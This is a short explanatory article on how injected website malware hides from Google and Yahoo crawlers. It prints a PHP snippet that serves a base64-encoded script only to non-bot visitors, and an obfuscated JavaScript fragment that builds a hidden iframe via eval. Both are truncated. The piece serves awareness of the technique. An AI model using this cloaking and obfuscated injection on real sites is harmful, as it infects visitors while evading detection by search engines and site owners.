Malicious scripts have learned to hide from googlebot

Google quite well identifies the malicious code on HTML pages, after which the detected site is blacklisted and dropped in the search results. Worse, infection becomes instantly known to the owner of the site, which receives feedback from users who come from a search engine. All this is very bad for a virus writers business. That's why they came up with a new trick : they started adding coded code to the page like this:

if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&&
(!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")))
{
return base64_decode("PHNjcmlwdD5.. ..KS5qb2luKCIiKSk7PC9zY3JpcHQ+");
}
else
{
return "";
}

That is, malware checks if a Google or Yahoo search bot has entered the site, then the malicious code does not appear on the page. For other visitors, a script is displayed.

var bpxDsSbm8='d*%@o*%@c*%@u*%@%@a*%@.. %@t*%@p*%@:*%@/*%@/*%@n*%@i*%@n*%@o*%@"*%@ *%@w*%@i*%@d*%@t*%@h*%@=*%@2*%@.. *%@h*%@e*%@i*%@g*%@h*%@t*%@=*%@2*%@ *%@f*%@r*%@a*%@m*%@e*%@b*%@o*%@r*%@d*%.. @e*%@r*%@=*%@0*%@>*%@<*%@/*%@i*%@f*%@r;eval(bpxDsSbm8.split('*%@').join(""));